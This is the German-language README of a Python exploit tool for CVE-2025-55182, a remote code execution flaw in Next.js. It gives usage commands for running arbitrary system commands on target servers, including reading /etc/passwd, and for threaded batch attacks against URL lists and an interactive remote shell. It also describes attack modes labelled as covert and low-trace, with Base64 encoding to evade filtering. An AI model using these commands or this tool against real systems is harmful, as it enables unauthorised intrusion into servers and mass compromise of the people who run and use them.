
Python-basierter Exploit für CVE-2025-55182 (Next.js RCE) mit Einzel-/Batch-Ziel-Scanning, Befehlsausführung, interaktiver Shell und 4 Angriffsmodi mit Base64-Kodierungsunterstützung.
Dieses Tool dient zur Erkennung und Ausnutzung der CVE-2025-55182-Sicherheitslücke (vermutlich eine Code-Ausführungslücke in Next.js-basierten Frameworks). Es unterstützt Einzel-/Mehrziel-Batch-Scans, Befehlsausführung, interaktive Shell und bietet 4 Angriffsmodi für verschiedene Szenarien. Flexible Konfigurationen wie Base64-codierte Befehle, Proxy-Weiterleitung und Log-Ausgabe sind verfügbar.
Die Schwachstelle CVE-2025-55182 könnte in Next.js-basierten Anwendungen existieren. Durch das Erstellen einer bösartigen Anfrage wird die Ausführungslogik in _response manipuliert, um das child_process-Modul zu injizieren und so eine Remote-Code-Ausführung (RCE) zu ermöglichen. Das Tool sendet speziell gestaltete Formulardaten, löst die Schwachstelle aus und gibt das Ergebnis der Befehlsausführung zurück.
requestspip install requests
# Führe den Befehl whoami aus (Angriffsmodus 1: mit Antwort)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# Führe Systembefehl aus (Base64-codiert, um Sonderzeichenabfang zu vermeiden)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# Vollständiger Antwortmodus (Base64-decodierte Ergebnisausgabe)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# Lese Ziel-URLs aus Datei, führe den Befehl id aus (20 Threads)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# Verbinde mit Ziel und wechsle in interaktive Befehlszeile (Unterstützung für Base64-Umschaltung)
python CVE-2025-55182-exploit.py -u https://target.com -s
# Packetanalyse über Burp Suite Proxy
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
| Parameter | Abkürzung | Erforderlich | Beschreibung | Beispiel |
|---|---|---|---|---|
--url | -u | Nein | Einzelziel-URL (alternativ zu -l, Priorität für -u) | -u https://target.com |
--url-list | -l | Nein | Datei mit Ziel-URLs (eine URL pro Zeile, ohne Protokoll automatisch http/https) | -l urls.txt |
--payload | -p | Nein | Angriffsmodus (Standard: 1) 1=mit Antwort (execSync) 2=ohne Antwort (execSync) 3=ohne Antwort (exec) | -p 2 |
--cmd | -c | Nein | Auszuführender Systembefehl (erforderlich bei Batch/Einzelziel, schließt sich mit -s aus) | -c "whoami" oder -c "dir" |
--threads | -t | Nein | Anzahl Threads für Batch-Scan (Standard: 10, empfohlen ≤50) | -t 20 |
--outlog | -o | Nein | Log-Datei (Standard: cve-2025-55182.log) | -o exploit.log |
--base64 | -b | Nein | Base64-Codierung des mit -c angegebenen Befehls (vermeidet Sonderzeichenabfang) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | Nein | Interaktiver Shell-Modus (nur mit -u, schließt sich mit -c aus) | -u https://target.com -s |
--proxy | - | Nein | Proxy-Konfiguration (HTTP/HTTPS für Paketanalyse oder Verkehrsumleitung) | --proxy http://127.0.0.1:8080 |
--skip-check | - | Nein | Überspringt Proxy-Verfügbarkeitsprüfung (standardmäßig wird Proxy geprüft) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | Nein | Request-Timeout in Sekunden (Standard: 10) | --time-out 15 |
| Modus-Nr. | Modusbeschreibung | Eigenschaften | Anwendungsszenario |
|---|---|---|---|
| 1 | Mit Antwort (execSync) | Synchroner Befehl, liefert 303-Weiterleitung, Ergebnis im Antwort-Header | Schnelle Überprüfung auf Existenz der Schwachstelle |
| 2 | Ohne Antwort (execSync) | Synchroner Befehl, kein Ergebnis (Ausführung muss anderweitig bestätigt werden) | Verdeckte Ausführung |
| 3 | Ohne Antwort (exec) | Asynchroner Befehl, kein Ergebnis (geringe Spuren, geeignet für Operationen ohne Bestätigung) | Verdeckter Batch-Angriff |
| 4 | Vollständige Antwort | Synchroner Befehl, Ergebnis Base64-codiert im Antwort-Body (Tool decodiert automatisch) | Szenarien, bei denen vollständige Ausgabe benötigt wird |
Nach Eintritt in den -s-Modus werden folgende integrierte Befehle unterstützt:
| Befehl | Funktionsbeschreibung |
|---|---|
b64 | Wechsel in Base64-codierten Befehlsmodus |
nob64 | Base64-Codierung beenden |
exit | Interaktive Shell beenden |
? | Hilfe anzeigen |
--outlog angegebene Datei geschrieben, für spätere Analyse;-u und -l schließen sich aus; bei gleichzeitiger Angabe wird -u bevorzugt.-c und -s schließen sich aus; im -s-Modus ist -c nicht erforderlich.-l-Datei kein Protokoll haben (z.B. target.com), versucht das Tool automatisch http:// und https://.https://target.com), um unnötige Verbindungsfehler zu vermeiden.-b oder b64-Modus übernimmt das Tool die Base64-Codierung/-Decodierung automatisch; kein manueller Eingriff nötig.--time-out-Zeit erhöht werden, um Fehlalarme zu vermeiden.